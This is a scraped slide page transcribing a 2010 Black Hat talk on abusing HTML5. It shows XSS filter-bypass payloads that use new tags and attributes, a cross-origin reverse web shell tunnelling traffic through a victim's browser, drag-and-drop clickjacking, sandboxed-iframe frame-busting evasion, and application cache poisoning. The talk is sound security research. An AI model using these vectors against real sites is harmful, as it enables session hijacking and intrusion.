attacking with html5
play

Attacking with HTML5 Lavakumar Kuppan Who am I ? Web Security - PowerPoint PPT Presentation

Jan 21, 2023 •280 likes •872 views

A TTACK TTACK & D EFENSE EFENSE labs Attacking with HTML5 Lavakumar Kuppan Who am I ? Web Security Researcher of Attack and Defense Labs, www.andlabs.org Penetration Tester @ really big bank Author of Imposter & Shell

  1. A TTACK TTACK & D EFENSE EFENSE labs Attacking with HTML5 Lavakumar Kuppan

  2. Who am I ? • Web Security Researcher • ½ of Attack and Defense Labs, www.andlabs.org • Penetration Tester @ really big bank • Author of Imposter & Shell of the Future • Likes HTML5 @lavakumark Disclaimer: Views expressed in this talk are my own and does not necessarily reflect those of my employer ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 2

  3. What to Expect? • Introduction to HTML5 • Attacking ‘HTML4’ websites with HTML5 • Network Reconnaissance with HTML5 • HTML5 Botnets • Tool Releases: – Ravan – JavaScript Distributed Password Cracker – JSRecon – HTML5 based JavaScript port/network scanner ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 3

  4. Let’s talk HTML5 Black Hat Abu Dhabi 2010 4

  5. What is HTML5 • Next major version of HTML • Adds new tags, event handlers to HTML • Adds new APIs to call from JavaScript • Native support for features currently provided by plug ‐ ins like Flash/Silverlight/Java ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 5

  6. There is some HTML5 in all of us • HTML5 is already here • Many features supported by latest versions of FireFox, Chrome, Safari and Opera. • IE is slowly getting there with IE9 Beta • Unless you are trying very hard, you most definitely would have some HTML5 in you(r machine) ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 6

  7. Is HTML5 hopelessly insecure? • Short answer ‐ NO. • Long answer – Security has been a major consideration in the design of the specification – But it is incredibly hard to add features in any technology without increasing the possibility of abuse This talk is about the abuse of some of HTML5’s features ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 7

  8. HTML5 Features featured in this talk • New Tags and Attributes • Cross Origin Requests • Drag ‐ n ‐ Drop API • Application Cache • WebSockets • WebWorkers ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 8

  9. Cross ‐ site Scripting via HTML5 Black Hat Abu Dhabi 2010 9

  10. Black‐list XSS filters • Filters are a popular way to prevent XSS attacks when encoding is not possible ‐ accepting rich content from users • White ‐ list filters like AntiSamy exist for this reason • But developers like developing…..custom filters • Almost all these filters are black ‐ list based • Ofcourse we know that black ‐ list filters fail • But ‘we’ are only about 0.1 % of the web community ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 10

  11. Bypassing Black‐list filters with HTML5 ‐ 1 • Filter blocks tags like ‘<script’, ‘<img’ etc � • HTML5 introduces new tags that can execute scripts ☺ • New tags == bypass outdated black ‐ lists ☺ Eg: <video onerror="javascript:alert(1)"><source> <audio onerror="javascript:alert(1)"><source> ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 11

  12. Bypassing Black‐list filters with HTML5 ‐ 2 • Filter blocks ‘<‘ and ‘>’, so tags cannot be injected � • But user input is being injected inside an elements’s attribute ☺ • Filter also blocks event attributes like onerror, onload etc � • HTML5 adds new event attributes � filter bypass ☺ Eg: <form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 12

  13. Bypassing Black‐list filters with HTML5 ‐ 3 • Similar to case ‐ 2 • But filter is blocking event attributes with regex ‘on\w+=‘. • This blocks the HTML5 attributes shown earlier � • HTML5’s ‘formaction’ event attribute can bypass this filter ☺ Eg: <form id="test" /><button form="test“ formaction="javascript:alert(1)">X ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 13

  14. Self‐triggering XSS exploits with HTML5 • A common XSS occurrence is injection inside some attribute of INPUT tags. • Current techniques require user interaction to trigger this XSS <input type="text" value=" ‐ >Injecting here" onmouseover="alert('Injected val')"> • HTML5 turns this in to self ‐ triggering XSS <input type="text" value=" ‐‐ >Injecting here" onfocus="alert('Injected value')" autofocus> ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 14

  15. HTML5 Security CheatSheet • Updated list of all HTML5 XSS vectors • Maintained by Mario Heiderich • All vectors discussed so far are from this list Front end : http://heideri.ch/jso/#html5 Back end: http://code.google.com/p/html5security/ ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 15

  16. Demo ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 16

  17. Reverse Web Shells with COR Black Hat Abu Dhabi 2010 17

  18. Cross Origin Request (COR) • Originally Ajax calls were subject to Same Origin Policy • Site A cannot make XMLHttpRequests to Site B • HTML5 makes it possible to make these cross domain calls • Site A can now make XMLHttpRequests to Site B as long as Site B allows it. • Response from Site B should include a header: Access ‐ Control ‐ Allow ‐ Origin: Site A ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 18

  19. Reverse Web Shell • This feature can be abused to set up a Reverse Web Shell • Say vuln.site is vulnerable to XSS and an attacker injects his payload in the victim’s browser • This payload can now make cross domain calls to attacker.site and read the response • This sets up a communication channel between the attacker and victim • Attacker can access vuln.site from victim’s browser by using this channel ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 19

  20. HTML5 Advantage • This attack was possible even without HTML5 • Tools like XSS Shell and XSS Proxy implemented them • But they relied on hacks for cross domain communication • This made them less reliable with poor performance • HTML5, with native support for cross domain communication takes this attack to whole another level ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 20

  21. Shell of the Future • Tool to automate the process of creating and accessing a Reverse Web Shell • Tunnels the attacker’s HTTP traffic over COR from the victim’s browser • Attacker can browse the victim’s session from his browser. • Can get around Session Hijacking countermeasure like Http ‐ Only and IP Address–Session ID binding • Comes loaded with two default JavaScript exploits • Supports HTTPS website as well ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 21

  22. Shell of the Future’s Architecture ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 22

  23. Demo ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 23

  24. Clickjacking with HTML5 Black Hat Abu Dhabi 2010 24

  25. Text‐field Injection using Drag and Drop API • Filling forms across domains is usually difficult in Clickjacking attacks • HTML5’s Drag and Drop API makes this easy • Attacker convinces the victim to perform a Drag and Drop operation • A simple game can be convincing here • By using frame overlays, this action can fill forms across domains • Introduced by Paul Stone at BlackHat Europe 2010 ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 25

  26. How it works • Attacker.site would contain and element like this: <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', ' Evil data ')“><h3>DRAG ME!!</h3></div> • When the victim starts dragging this, the event’s data value is set to ‘Evil Data’ • Victim drops the element on to an text field inside an invisible iframe • That field is populated with the value ‘Evil Data’. ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 26

  27. IFRAME Sandboxing • HTML5 adds Sandbox attribute to the IFRAME tag • Can be used to disable JavaScript in the Iframe. • Many websites rely solely on frame busting for Clickjacking protection • If such sites are included inside an Sandboxed Iframe, frame busting is disabled <iframe src="http://www.victim.site" sandbox></iframe> ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 27

  28. Demo ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 28

  29. HTML5 Cache Poisoning Black Hat Abu Dhabi 2010 29

  30. Poisoning HTML5 Application Cache • Application Cache has longer life than regular cache • Must be deleted explicitly in Firefox but it asks for user approval before setting this cache • Chrome and Safari do not ask for user approval but deleting regular cache also deletes this cache • For a regular cache, refreshing the page would update it but Application Cache would still retain the poisoned content • Imposter has a module to poison Application Cache ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 30

  31. Demo ATTACK ATTACK & DEFENSE DEFENSE labs Black Hat Abu Dhabi 2010 31

Recommend

of HTML5 the design of HTML5 the design of HTML5 design principles We hold these Truths to be

of HTML5 the design of HTML5 the design of HTML5 design principles We hold these Truths to be

the design of HTML5 the design of HTML5 the design of HTML5 design principles We hold these Truths to be self-evident, that all Men are created equal, that they are endowed by their Creator with certain unalienable Rights, that among these

821 views • 53 slides
Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat Researcher at Trend Micro- research and blogger on criminal underground, persistent threats,

792 views • 44 slides
HTML5 Mendel Rosenblum CS142 Lecture Notes - HTML5 HTML continually being extended

HTML5 Mendel Rosenblum CS142 Lecture Notes - HTML5 HTML continually being extended

HTML5 Mendel Rosenblum CS142 Lecture Notes - HTML5 HTML continually being extended Standard driven by different constituent groups Huge: many new features covering many areas HTML5 - now at least partially implemented in most

734 views • 16 slides
HTML5 and Video Bas Zoetekouw Bas.zoetekouw@surfnet.nl HTML5 Video Report published (jan 2011)

HTML5 and Video Bas Zoetekouw Bas.zoetekouw@surfnet.nl HTML5 Video Report published (jan 2011)

HTML5 and Video Bas Zoetekouw Bas.zoetekouw@surfnet.nl HTML5 Video Report published (jan 2011) HTML5 Video: current status by Herman van Dompseler and Bas Zoetekouw Download at http://www.mediamosa.org/content/html5-video-current-situation

589 views • 23 slides
Introduction to HTML5 Where to start learning about HTML5? HTML 5 differences from HTML 4

Introduction to HTML5 Where to start learning about HTML5? HTML 5 differences from HTML 4

Introduction to HTML5 Where to start learning about HTML5? HTML 5 differences from HTML 4 http://w3.org/TR/html5-diff/ HTML 5 HTML 4 http://standards.mitsue.co.jp/ resources/w3c/TR/html5-diff/ HTML5 differences

684 views • 35 slides
SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1 Alexander @sh2kerr Polyakov. PCI QSA,PA-QSA 11 We change look but we keep mind Company Digital Security Research Group International

924 views • 59 slides
Introduction to Programming the HTML5 Canvas by Elaine Blomeyer and Jim Town HTML5 Canvas

Introduction to Programming the HTML5 Canvas by Elaine Blomeyer and Jim Town HTML5 Canvas

Introduction to Programming the HTML5 Canvas by Elaine Blomeyer and Jim Town HTML5 Canvas Basics To start with go to http://www. missblomeyer.com/csta2014/ and right click on template to save file. Copy the template 1. Open a text editor

595 views • 31 slides
Geometry with the HTML5 Canvas by Jim Town and Elaine Blomeyer HTML5 Canvas Basics To start

Geometry with the HTML5 Canvas by Jim Town and Elaine Blomeyer HTML5 Canvas Basics To start

Geometry with the HTML5 Canvas by Jim Town and Elaine Blomeyer HTML5 Canvas Basics To start with go to http://www. missblomeyer.com/todos2014/ and right click on template to save file. The origin You might be familiar with Cartesian But on

758 views • 29 slides
Chapter 2 - Introduction to HTML5: Part 1 2.1 Introduction / 2.2 Editing HTML5 HTML 5

Chapter 2 - Introduction to HTML5: Part 1 2.1 Introduction / 2.2 Editing HTML5 HTML 5

IT350 Web and Internet Programming Chapter 2 - Introduction to HTML5: Part 1 2.1 Introduction / 2.2 Editing HTML5 HTML 5 (HyperText Markup Language 5) A markup language that specifies the structure and content of documents Separates

467 views • 12 slides
HTML5 Dont talk trash about my Flash! Tuesday, 11 May 2010 What is HTML5? HTML

HTML5 Dont talk trash about my Flash! Tuesday, 11 May 2010 What is HTML5? HTML

HTML5 Dont talk trash about my Flash! Tuesday, 11 May 2010 What is HTML5? HTML (Hypertext markup language) is the language underneath every web page youve ever been to The language, along with its various complementary

493 views • 21 slides
EnGiNeErInG HtMl5 aPpLiCaTiOnS fOr bEtTeR pErFoRmAnCe LaUrI SvAn @ LaUrI S An @lAuRiS

EnGiNeErInG HtMl5 aPpLiCaTiOnS fOr bEtTeR pErFoRmAnCe LaUrI SvAn @ LaUrI S An @lAuRiS

EnGiNeErInG HtMl5 aPpLiCaTiOnS fOr bEtTeR pErFoRmAnCe LaUrI SvAn @ LaUrI S An @lAuRiS lAuRiSvAn An Sc5 OnLiNe @sC5 Sc5 OnLiNe @sC5 ViCe HtMl5 eXpErTiSe a HtMl5 eXpErTiSe aT y T yOuR sEr OuR sErViCe GiVe mE sOmEtHiNg tHaT I

521 views • 37 slides
video It's a lot more than just a HTML5 tag Jess Portnoy jess.portnoy@kaltura.com, Kaltura,

video It's a lot more than just a HTML5 tag Jess Portnoy jess.portnoy@kaltura.com, Kaltura,

video It's a lot more than just a HTML5 tag Jess Portnoy jess.portnoy@kaltura.com, Kaltura, Inc Abstract The element was first proposed by Opera Software in &lt;video&gt; February 2007. Integrating video elements into the HTML5 standard

350 views • 17 slides
IT350 Web &amp; Internet Programming Fall 2016 Set 2: Introduction to HTML5 Introduction and

IT350 Web &amp; Internet Programming Fall 2016 Set 2: Introduction to HTML5 Introduction and

IT350 Web &amp; Internet Programming Fall 2016 Set 2: Introduction to HTML5 Introduction and Editing HTML5 HTML 5 (HyperText Markup Language 5) A markup language that specifies the structure and content of documents Separates

169 views • 12 slides
IT350 Web &amp; Internet Programming Fall 2015 Set 2: Introduction to HTML5 Introduction and

IT350 Web &amp; Internet Programming Fall 2015 Set 2: Introduction to HTML5 Introduction and

IT350 Web &amp; Internet Programming Fall 2015 Set 2: Introduction to HTML5 Introduction and Editing HTML5 HTML 5 (HyperText Markup Language 5) A markup language that specifies the structure and content of documents Separates

784 views • 23 slides
HTML5 game pro rovid ider About SOFTGAMES A leading developer of the most popular Instant Games

HTML5 game pro rovid ider About SOFTGAMES A leading developer of the most popular Instant Games

Report rt fr from th the tr trenches of f an HTML5 game pro rovid ider About SOFTGAMES A leading developer of the most popular Instant Games for Facebook Messengers Operating the worlds largest platform for HTML5 games

723 views • 12 slides
Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of

Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of

Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 1 1 Attacking the stack We have seen how the stack works. Now: lets see how we can abuse this. We have

733 views • 48 slides
James Pearce Director, Developer Relations @ jamespearce jamesp@sencha.com HTML5 and the dawn

James Pearce Director, Developer Relations @ jamespearce jamesp@sencha.com HTML5 and the dawn

James Pearce Director, Developer Relations @ jamespearce jamesp@sencha.com HTML5 and the dawn of rich mobile web applications or Everything I know about HTML5 I learned from How Mobile Rolls 2008 We must have an iPhone App! 2010 We

1.33k views • 98 slides
Design and Debug HTML5 Apps for Devices with RIB and Web Simulator Gail R. Frederick Intel

Design and Debug HTML5 Apps for Devices with RIB and Web Simulator Gail R. Frederick Intel

Design and Debug HTML5 Apps for Devices with RIB and Web Simulator Gail R. Frederick Intel Corporation Open Source Technology Center OSCON 2012 - July 19, 2012 Agenda Learn how to develop and debug HTML5 apps for mobile devices using new

200 views • 18 slides
y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

Security bug of the week (in iOS and OS X) y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 2 2 Attacking the stack g We have seen how the

850 views • 47 slides
Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State

Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State

Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State University of New York) Joint with Seth Chaiken and Christopher R.H. Hanusa Outline 1. Chess Problems: Non-Attacking Pieces 2. Largely Czech

608 views • 17 slides
Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology

Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology

Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology for some of these slides Attacking the stack We have seen how the stack works. Now: lets see how we can abuse this. We have already seen how code

671 views • 47 slides
JavaScript Security &amp; HTML5 ( a n d P r i v a c y ) Mike Shema RVAsec May 31,

JavaScript Security &amp; HTML5 ( a n d P r i v a c y ) Mike Shema RVAsec May 31,

JavaScript Security &amp; HTML5 ( a n d P r i v a c y ) Mike Shema RVAsec May 31, 2013 Weve Been Here Before A Definition Ja va Script | jv skript | invective . 1 A vendor-neutral, cross-platform liability for

583 views • 42 slides
Attacking and Supporting Subrogation Damages in Wildland Fire Cases CRAIG S. SIMON SUE MUNCEY

Attacking and Supporting Subrogation Damages in Wildland Fire Cases CRAIG S. SIMON SUE MUNCEY

Attacking and Supporting Subrogation Damages in Wildland Fire Cases CRAIG S. SIMON SUE MUNCEY Introduction. Audience analysis. The basics Property Insurance Subrogation ATTACKING AND SUPPORTING SUBROGATION DAMAGES IN

371 views • 19 slides
No Need to Marry to Change your Name! Attacking Profinet IO Automation Networks Using DCP S

No Need to Marry to Change your Name! Attacking Profinet IO Automation Networks Using DCP S

20.06.2019 No Need to Marry to Change your Name! Attacking Profinet IO Automation Networks Using DCP S tefan Mehner, Hartmut Knig Brandenburg University of Technology Cottbus - S enftenberg Evolution in Industrial Control Systems

675 views • 18 slides

More recommend